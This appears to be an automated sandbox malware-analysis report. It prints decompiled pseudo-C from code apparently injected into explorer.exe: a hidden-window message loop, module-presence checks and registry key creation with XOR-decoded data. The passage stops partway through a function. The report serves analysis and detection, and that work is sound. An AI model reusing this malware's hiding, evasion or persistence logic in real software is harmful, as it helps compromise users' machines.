GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
LoadLibraryA.KERNEL32(00000000), ref: 00092551

Strings

kernel32.dll, xrefs: 000924B3
GetProcAddress, xrefs: 000924C1

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00082EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00082EDA(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0x9e684; // 0x34f8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0x9e688; // 0xb0000
				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E00082E77;
				_push( &_v52);
				_t32 =  *0x9e694; // 0x34fa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0x9e718; // 0x602c4
					if(_t34 != 0) {
						_t39 =  *0x9e694; // 0x34fa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0x9e694; // 0x34fa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0x9e718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0x9e694; // 0x34fa48
				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
				while(1) {
					_t50 =  *0x9e694; // 0x34fa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0x9e694; // 0x34fa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0x9e694; // 0x34fa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}

0x00082ee3
0x00082ef2
0x00082ef9
0x00082efe
0x00082f18
0x00082f20
0x00082f2d
0x00082f34
0x00082f3a
0x00082f41
0x00082f42
0x00082f47
0x00082f50
0x00082fcd
0x00082fcd
0x00082fd4
0x00082fd7
0x00082fdc
0x00082fdc
0x00082fdf
0x00082fe7
0x00082fec
0x00082ff4
0x00082ff4
0x00082f77
0x00082f7a
0x00082f81
0x00000000
0x00000000
0x00082f8a
0x00082f8d
0x00082f98
0x00082fba
0x00082fc1
0x00082fc6
0x00082fcb
0x00000000
0x00000000
0x00082fa0
0x00000000
0x00000000
0x00082fa6
0x00082fab
0x00082fb2
0x00082fb7
0x00082fb7
0x00000000

APIs

memset.MSVCRT ref: 00082EF9
CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
ShowWindow.USER32(00000000,00000000), ref: 00082F8A

Strings

0, xrefs: 00082F2D

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Window$CreateShowmemset
String ID: 0
API String ID: 3027179219-4108050209
Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00084D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x9e688; // 0xb0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E0008A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E0008A471( &_v556, _t298);
					 *0x9e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
						 *0x9e680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000895E1(0x9b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x9e688; // 0xb0000
						_t127 = E000892E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000885D5( &_v612);
						_t130 = E0008B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E0008861A( &_v616, 0xfffffffe);
						_t133 =  *0x9e688; // 0xb0000
						_t22 = _t133 + 0x114; // 0xb0114
						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x9e688; // 0xb0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x9e680; // 0x34fdb0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E0008E2C6(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0x9e6b4; // 0x34fa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E0008E2C6(_t353,  &_v588);
								_t235 =  *0x9e6b4; // 0x34fa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x9e73c;
							if( *0x9e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x9e680; // 0x34fdb0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x9e688; // 0xb0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000849A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x9e684; // 0x34f8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x9e688; // 0xb0000
											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E00088604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E0008109A(_t262, 0x148);
													_t305 =  *0x9e688; // 0xb0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E0008902D(_t271,  &_v572);
													_t272 =  *0x9e688; // 0xb0000
													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x9e688; // 0xb0000
														__eflags = _t200 + 0x1020;
														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000885D5( &_v636);
														E0008A911(_t333, 0, 0xbb8, 1); // executed
														E0008861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E0008861A( &_v616, 0xfffffffe); // executed
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000849A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x9e684; // 0x34f8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E00088604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000895E1(_t278, 0x32d);
										_t280 =  *0x9e688; // 0xb0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000885D5( &_v636);
										E0008A911(_t249, 0, 0xbb8, 1);
										E0008861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000895E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x9e688; // 0xb0000
								_t329 = E000892E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E0008B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x9e684; // 0x34f8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E0008861A( &_v612, 0xfffffffe);
								}
								E000885D5( &_v616);
								_t150 =  *0x9e688; // 0xb0000
								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
								_t153 =  *0x9e688; // 0xb0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x9e738, 0x105);
								_t331 =  *0x9e688; // 0xb0000
								_t117 = _t331 + 0x228; // 0xb0228
								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
								E0008861A(0x9e740, 0xfffffffe);
								E0008861A(0x9e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000895C7(0x6e2);
				_v616 = _t250;
				_t326 = E000895C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000885C2( &_v616);
					_t122 = E000885C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

0x00084d6d
0x00084d73
0x00084d79
0x00084d7e
0x00084d8c
0x00084d8f
0x00084dee
0x00084df7
0x00084e00
0x00084e03
0x00084e0a
0x00084e0f
0x00084e14
0x00084e1b
0x00084e25
0x00084e2c
0x00084e32
0x00084e37
0x00084e3c
0x00084e43
0x00084e49
0x00084e4b
0x00084e4c
0x00084e50
0x00084e5b
0x00084e60
0x00084e69
0x00084e6e
0x00084e76
0x00084e7d
0x00084e7e
0x00084e80
0x00084e9c
0x00084e9f
0x00084e9f
0x00084ea8
0x00084ead
0x00084ebd
0x00084ec5
0x00084eca
0x00084ed0
0x00084ed3
0x00084ed9
0x00084ef8
0x00084efe
0x00084eff
0x00084f00
0x00084f01
0x00084f02
0x00084f03
0x00084f0d
0x00084f11
0x00084f16
0x00084f19
0x00084f1b
0x00084f2d
0x00084f2d
0x00084f2f
0x00084f3b
0x00084f40
0x00084f46
0x00084f4f
0x00084f52
0x00084f54
0x00084f5f
0x00084f64
0x00084f69
0x00084f6e
0x00084f6e
0x00084f71
0x00084f78
0x00000000
0x00084f7e
0x00084f7e
0x00084f83
0x00084f87
0x00084f89
0x00084f8c
0x00084f8e
0x00084f94
0x00084f94
0x00084f8e
0x00084f96
0x00084f9b
0x00084fa1
0x00084fa3
0x00000000
0x00084fa9
0x00084fa9
0x00084fad
0x00085082
0x00085088
0x0008508e
0x00085099
0x0008509a
0x0008509b
0x0008509c
0x000850a2
0x000850a7
0x000850ad
0x000850b5
0x000850bb
0x000850be
0x000850cd
0x000850d4
0x000850d7
0x000850e4
0x000850e8
0x000850f5
0x000850fa
0x000850fd
0x000850ff
0x00085110
0x00085112
0x00085116
0x00085117
0x00085119
0x00085124
0x00085129
0x00085136
0x0008513a
0x0008513b
0x0008513d
0x00085145
0x00085146
0x0008514b
0x00085163
0x00085168
0x0008516b
0x0008516f
0x00085171
0x00085184
0x0008518e
0x00085192
0x0008519a
0x0008519b
0x000851a3
0x000851a4
0x000851a9
0x000851b5
0x000851bf
0x000851d1
0x000851dd
0x000851e2
0x000851e2
0x000851ec
0x000851f2
0x000851f2
0x00085119
0x000850ff
0x00000000
0x00085088
0x00084fb3
0x00084fb6
0x00000000
0x00000000
0x00084fbc
0x00084fc7
0x00084fc8
0x00084fc9
0x00084fca
0x00084fd0
0x00084fd5
0x00084fe9
0x00084fee
0x00084ff2
0x00084ffd
0x00085006
0x00085008
0x0008500c
0x0008500d
0x0008500f
0x0008501a
0x00085020
0x00085032
0x00085035
0x00085038
0x00085045
0x0008504d
0x00085057
0x00085069
0x00085075
0x0008507a
0x00000000
0x0008500f
0x00084fa3
0x00084edb
0x00084edb
0x00084ee1
0x00084ee3
0x00000000
0x00000000
0x00084ee5
0x00084ee9
0x000851f3
0x000851f8
0x000851fe
0x00085200
0x00085201
0x00085205
0x00085215
0x0008521a
0x0008521e
0x00085220
0x00085224
0x00085229
0x0008522b
0x0008522d
0x00085233
0x00085233
0x00085240
0x00085246
0x0008524c
0x00085251
0x0008526f
0x00085271
0x0008527d
0x0008527d
0x00085283
0x00085285
0x0008528b
0x0008529d
0x000852a3
0x000852af
0x000852b7
0x000852b7
0x000852b7
0x000852b9
0x000852bf
0x000852bf
0x00084eef
0x00084ef2
0x00000000
0x00000000
0x00000000
0x00084ef2
0x00084ed9
0x00084e1d
0x00084e1d
0x00000000
0x00084e1d
0x00084d9b
0x00084da2
0x00084dab
0x00084dad
0x00084db3
0x00084dc4
0x00084dcd
0x00084dcd
0x00084dd9
0x00084de2
0x00084de7
0x00084dec
0x00000000
0x00000000
0x00084dec

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: 4a50328df8d3e64cefb64bf281c7b55ad0a95e4f9f5383233e43d29d8882ca49
Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
Opcode Fuzzy Hash: 4a50328df8d3e64cefb64bf281c7b55ad0a95e4f9f5383233e43d29d8882ca49
Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52

Uniqueness

Uniqueness Score: -1.00%

Function 00089B43, Relevance: 6.3, APIs: 4, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E00088604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000895C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00089292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0x9e68c; // 0x34fab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E00089292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0x9e688; // 0xb0000
						_t128 =  *0x9e68c; // 0x34fab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0x9e68c; // 0x34fab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000885C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								RegCloseKey();
								_t155[0x43] = _v8;
								_t101 = E0008C379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E0008861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E0008861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E0008861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00089292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0x9e68c; // 0x34fab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0x9e68c; // 0x34fab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000895E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000892E5(_v32);
							_v32 = _t179;
							E000885D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E00089256(_v12);
							_v24 = _t147;
							_t148 =  *0x9e68c; // 0x34fab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E0008861A( &_v32, 0xfffffffe);
							E0008861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00089292(_v12);
						_t171 =  *0x9e684; // 0x34f8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E0008861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}

0x00089b4c
0x00089b4e
0x00089b51
0x00089b53
0x00089b5b
0x00089b5e
0x00089b65
0x00089b6d
0x00089b6f
0x00089b75
0x00089b7e
0x00089b86
0x00089b8c
0x00089b93
0x00089b99
0x00089b9b
0x00089b9e
0x00089ba0
0x00089ba0
0x00089ba0
0x00089ba8
0x00089bab
0x00089bb0
0x00089bb3
0x00089bb6
0x00089bb8
0x00089cee
0x00089cee
0x00089cf4
0x00089cfb
0x00089d3c
0x00089d40
0x00089d41
0x00089d47
0x00089d4c
0x00089d4f
0x00089d4f
0x00089d51
0x00000000
0x00089d51
0x00089d00
0x00089d0a
0x00089d13
0x00089d18
0x00089d1b
0x00089d1e
0x00000000
0x00000000
0x00089d20
0x00089d24
0x00089d25
0x00089d2a
0x00089d2b
0x00089d2e
0x00089d32
0x00089d37
0x00000000
0x00089bbe
0x00089bbe
0x00089bcb
0x00089bd1
0x00089bd4
0x00089bd6
0x00089ceb
0x00000000
0x00089ceb
0x00089bdf
0x00089be3
0x00089beb
0x00089bf2
0x00089bf5
0x00089bf8
0x00089d54
0x00089d57
0x00089d6f
0x00089d72
0x00089d74
0x00089dc8
0x00089dcb
0x00089dcd
0x00089dcf
0x00089dcf
0x00089dd5
0x00089dd8
0x00089ddd
0x00089de4
0x00089dea
0x00089def
0x00089df2
0x00089df4
0x00089e0b
0x00089e11
0x00000000
0x00000000
0x00000000
0x00000000
0x00089df6
0x00089df6
0x00089e02
0x00089e06
0x00089e07
0x00089e07
0x00000000
0x00089df6
0x00089d79
0x00089d86
0x00089d89
0x00089d8b
0x00089dba
0x00089dbd
0x00089dbf
0x00089dc1
0x00089dc1
0x00089dc3
0x00000000
0x00089dc3
0x00089d8d
0x00089d96
0x00089da2
0x00089dad
0x00000000
0x00089db2
0x00089bfe
0x00089bff
0x00089c02
0x00089c07
0x00089c0b
0x00089c10
0x00089c13
0x00089c16
0x00089c18
0x00000000
0x00000000
0x00089c29
0x00089c31
0x00089c34
0x00089c36
0x00089cab
0x00089cb3
0x00089c38
0x00089c3a
0x00089c49
0x00089c51
0x00089c57
0x00089c5a
0x00089c62
0x00089c65
0x00089c6f
0x00089c72
0x00089c77
0x00089c7a
0x00089c7c
0x00089c7e
0x00089c81
0x00089c83
0x00089c85
0x00089c85
0x00089c83
0x00089c91
0x00089c9c
0x00089ca1
0x00089ca4
0x00089ca4
0x00089cc3
0x00089cc8
0x00089cce
0x00089cd1
0x00089cd3
0x00089cd9
0x00089ce2
0x00000000
0x00089ce8
0x00089bb8
0x00089b77
0x00000000

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2e02a3581bfa86ee0236564b08f4adab1e49b8db52c5e66971988f717cc598b6
Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
Opcode Fuzzy Hash: 2e02a3581bfa86ee0236564b08f4adab1e49b8db52c5e66971988f717cc598b6
Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000832A1, Relevance: 6.2, APIs: 4, Instructions: 189
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E000832A1() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
